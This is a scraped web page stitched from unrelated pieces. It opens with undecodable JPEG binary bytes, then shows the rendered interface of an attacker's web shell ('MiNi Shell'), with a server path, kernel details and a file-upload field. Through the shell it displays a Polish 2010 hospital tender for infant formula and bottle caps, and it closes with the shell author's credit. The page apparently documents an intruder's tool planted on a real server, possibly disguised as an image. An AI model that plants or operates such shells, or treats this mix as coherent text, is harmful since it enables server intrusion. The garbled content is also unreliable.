JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/384750-N-2010.html

<p class="kh_header"><b>Poznań: Dostawa mleka i środków spożywczych specjalnego przeznaczenia  do Ginekologiczno-Położniczego Szpitala Klinicznego Uniwersytetu  Medycznego  im. Karola Marcinkowskiego w Poznaniu,  przy  
ul. Polnej 33</b><br>
<b>Numer ogłoszenia: 384750 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ginekologiczno-Położniczy Szpital Kliniczny Uniwersytetu Medycznego im. Karola Marcinkowskiego w Poznaniu , ul. Polna 33, 60-535 Poznań, woj. wielkopolskie, tel. 061 8419294, faks 061 8419620.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gpsk.am.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mleka i środków spożywczych specjalnego przeznaczenia  do Ginekologiczno-Położniczego Szpitala Klinicznego Uniwersytetu  Medycznego  im. Karola Marcinkowskiego w Poznaniu,  przy  
ul. Polnej 33.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest dostawa mleka i środków spożywczych specjalnego przeznaczenia do Ginekologiczno-Położniczego Szpitala  Klinicznego  Uniwersytetu  Medycznego  im. K. Marcinkowskiego  
w  Poznaniu  w  podziale  na  części;
1. Część  nr  1  -   Mleko początkowe. Produkty specjalistyczne do stosowania od urodzenia w profilaktyce alergii, przy ulewaniu i dla noworodków z małą i bardzo małą urodzeniową masą ciała. Produkty lecznicze do stosowania od urodzenia, w zaburzeniach trawienia, wchłaniania i alergii na białko mleka krowiego  ( poz. 1 -  32 000 sztuk butelek o pojemności 100ml,  poz. 2- 34 000 sztuk  butelek o pojemności 60 ml, poz. 3 - 10 000 sztuk saszetek  a 2,1 g,  poz. 4 -  200 sztuk puszek  a  450 g,  poz. 5 - 50 sztuk op.  a  135 g)
2. Część  nr  2  -   Mleko początkowe. Produkty lecznicze do stosowania od urodzenia w zaburzeniach trawienia, wchłaniania i alergii  na  białko  mleka krowiego. Produkty specjalistyczne do stosowania od urodzenia przy ulewaniu  (poz. 1 -  20 500 sztuk butelek o pojemności 59ml,  poz. 2- 440 sztuk  puszek a  425 g,  poz. 3 -  100 sztuk puszek  a  400 g)
3. Część  nr 3  -  Mleko początkowe. Produkty specjalistyczne do stosowania od urodzenia u noworodków z małą i bardzo małą urodzeniową masą ciała.  (poz. 1 -  10 000 sztuk butelek o pojemności 90ml,  poz. 2- 25 500 sztuk butelek o pojemności 90ml)
4. Część  nr  4  -  nakrętki jednorazowe  na butelki ( 140 000 sztuk).
2) Zamawiający  w  odniesieniu  do  przedmiotu  zamówienia  wymaga:
a) realizacji  dostaw  w  nieprzekraczalnym  terminie  7  dni,  od  dnia  złożenia  zamówienia  pisemnie  lub  przy  pomocy  faksu,
b) realizacji  dostaw  na  CITO  zgodnie  z  zadeklarowanym  przez  Wykonawcę  terminem,
c) terminu  ważności  nie  krótszego  niż  6  miesięcy  od  daty  dostawy  do  Zamawiającego,
d) opisu  etykiet  i  ulotek  informacyjnych  w  języku  polskim,
e) dostaw  produktów  identycznych   z  zaproponowanymi  w  ofercie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8, 33.69.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie  wymaga  wniesienia  wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza  szczegółowego  warunku  w  tym  zakresie, tym samym  nie  dokonuje  jego  opisu. W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Pzp wykonawca zobowiązany jest złożyć (wraz z ofertą) oświadczenie - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, gdy Wykonawca  wykaże,  że  wykonał  w  okresie  ostatnich  trzech  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie, dwie  dostawy  polegające  na  wykonaniu  w  ramach  jednej  umowy  dostawy odpowiadającej  przedmiotowi  zamówienia i wartości  każdej   z  nich  nie  mniejszej  niż;
1) 40 000  zł brutto  dla  części  nr  1,	
2) 15 000  zł brutto  dla  części  nr  2,
3) 25 000  zł brutto  dla  części  nr  3,
4) 20 000  zł brutto  dla  części  nr  4
oraz  załączenia  dokumentu  potwierdzającego,  że  te  dostawy  zostały  wykonane  lub  są  wykonywane  należycie;
Dokumentami potwierdzającymi należyte wykonanie dostaw mogą być np. referencje, rekomendacje, listy polecające, opinie itp. Z treści w/w dokumentów winno jednoznacznie wynikać, iż dotyczą one przedstawionych w wykazie dostaw .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza  szczegółowego  warunku  w  tym  zakresie, tym samym  nie  dokonuje  jego  opisu. W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Pzp wykonawca zobowiązany jest złożyć (wraz z ofertą) oświadczenie - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza  szczegółowego  warunku  w  tym  zakresie, tym samym  nie  dokonuje  jego  opisu. W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Pzp wykonawca zobowiązany jest złożyć (wraz z ofertą) oświadczenie - załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie  wyznacza  szczegółowego  warunku  w  tym  zakresie, tym samym  nie  dokonuje  jego  opisu. W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 Pzp wykonawca zobowiązany jest złożyć (wraz z ofertą) oświadczenie - załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W  celu  potwierdzenia,  że oferowane dostawy  odpowiadają wymaganiom określonym przez  Zamawiającego,
Zamawiający  wymaga  przedstawienia  wraz  z  ofertą:
a) Świadectwa  Rejestracji Produktu  Leczniczego  oraz  Charakterystykę  Produktu Leczniczego   -  dotyczy  części  nr  1,  pozycja 4  i części  nr  2,  pozycja 2.
b) Oświadczenia,  iż oferowane produkty są środkami spożywczymi specjalnego przeznaczenia zgodnie z ustawą z dnia  11 maja 2001 r. (t. j. Dz. U z 2005 r. Nr 31 poz. 265 ze zm. ) o warunkach zdrowotnych  żywności 
i żywienia i spełniają wymagania zawarte w rozporządzeniu Ministra Zdrowia z dnia 17.10.2007 r. ( Dz. U. z 2007 r. Nr 209 poz. 1518 zmiana Dz.U.08.208.1313,  Dz.U.10.16.89)  w sprawie środków spożywczych specjalnego przeznaczenia żywieniowego - dotyczy części nr 1, poz. 1-3 i poz. 5, części nr 2 poz. nr 1 
i  nr 2  oraz części nr 3.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie  ubiegający  się  o  udzielenie  zamówienia  winni  ustanowić  pełnomocnika  do reprezentowania  ich  w  postępowaniu  albo  reprezentowania  w  postępowaniu  i  zawarcia  umowy w sprawie zamówienia publicznego ( do oferty dołączyć odpowiednie pełnomocnictwo ). Wszelka korespondencja  oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik pozostałych. Oferta musi być podpisana w taki sposób, by  prawnie zobowiązywała wszystkie podmioty występujące wspólnie. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy. Na  podstawie  przepisu   art.  36,  ust.  4  ustawy  Zamawiający  żąda  wskazania   przez  Wykonawcę  w  ofercie  części  zamówienia,  której  wykonanie  powierzy  podwykonawcom.  Wszelkie pełnomocnictwa  winny  być załączone do oferty w formie oryginału lub urzędowo poświadczonego odpisu pełnomocnictwa 
( notarialnie - art. 96 ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie ( tekst jednolity Dz. U. z 2008 r. Nr 189 poz. 1158 z późn. zm. ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z uwzględnieniem zapisu art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych  zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz  określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów;
a) aneks cenowy dopuszczający zmianę ceny w przypadku zmiany stawki podatku VAT zgodnie 
z obowiązującymi przepisami,
b) aneks  cenowy  dopuszczający  jedną  zmianę  ceny  po  upływie  dwunastu  miesięcy  obowiązywania  umowy  w  oparciu  o  wysokość wskaźnika wzrostu cen towarów dla poszczególnych grup produktów, opublikowanego przez  GUS w Biuletynie Statystycznym GUS - Wskaźnik Cen Towarów i Usług Konsumpcyjnych Tab. 41,
c) aneks dopuszczający zmianę  oznaczenia  przedmiotu umowy w zakresie:
- nr katalogowego wyrobu, 
- nazwy wyrobu  przy zachowaniu jego parametrów, 
- sposobu konfekcjonowania, 
- liczby opakowań 
nie zmieniający  ceny  jednostkowej  i wartości umowy.
d) aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
e) aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, a które to działania nie są konsekwencją winy którejkolwiek ze stron.
W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić  z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gpsk.am.poznan.pl/dzp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Odbiór osobisty w siedzibie Zamawiającego, przy ul. Polnej 33 w Poznaniu, budynek E1, I piętro, pokój 104 oraz za pośrednictwem poczty po uprzednio złozonym wniosku lub ze strony internetowej GPSK.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2010 godzina 09:00, miejsce: W siedzibie Zamawiającego przy  ul. Polnej  33 , pokoj  nr  317 - Kancelaria  Ogólna  mieszcząca  się  w  Budynku  Wielofunkcyjnym  Szpitala, wejście  D1  lub  drogą  pocztową na adres Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mleko początkowe.
Produkty specjalistyczne do stosowania od urodzenia w profilaktyce alergii, przy ulewaniu  i  dla  noworodków  z  małą  i  bardzo  małą  urodzeniową  masą ciała.
Produkty lecznicze do stosowania od urodzenia,  w zaburzeniach trawienia, wchłaniania i alergii na białko mleka krowiego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko początkowe. Produkty specjalistyczne do stosowania od urodzenia w profilaktyce alergii, przy ulewaniu i dla noworodków z małą i bardzo małą urodzeniową masą ciała. Produkty lecznicze do stosowania od urodzenia, w zaburzeniach trawienia, wchłaniania i alergii na białko mleka krowiego  ( poz. 1 -  32 000 sztuk butelek o pojemności 100ml,  poz. 2- 34 000 sztuk  butelek o pojemności 60 ml, poz. 3 - 10 000 sztuk saszetek  a 2,1 g,  poz. 4 -  200 sztuk puszek  a  450 g,  poz. 5 - 50 sztuk op. a  135 g).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8, 33.69.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Mleko początkowe.
Produkty lecznicze do stosowania od urodzenia  w zaburzeniach trawienia, wchłaniania i alergii na białko mleka krowiego.
Produkty specjalistyczne do stosowania od urodzenia przy ulewaniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko początkowe. Produkty lecznicze do stosowania od urodzenia w zaburzeniach trawienia, wchłaniania i alergii  na  białko  mleka krowiego. Produkty specjalistyczne do stosowania od urodzenia przy ulewaniu  (poz. 1 -  20 500 sztuk butelek o pojemności 59ml,  poz. 2- 440 sztuk  puszek a  425 g,  poz. 3 -  100 sztuk puszek  a  400 g).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8, 33.69.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mleko początkowe.
Produkty specjalistyczne do stosowania od urodzenia u noworodków z małą i bardzo małą urodzeniową masą ciała..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mleko początkowe. Produkty specjalistyczne do stosowania od urodzenia u noworodków z małą i bardzo małą urodzeniową masą ciała.  (poz. 1 -  10 000 sztuk butelek o pojemności 90ml,  poz. 2- 25 500 sztuk butelek o pojemności 90ml).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Nakrętki na butelki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nakrętki jednorazowe  na butelki ( 140 000 sztuk).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.88.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com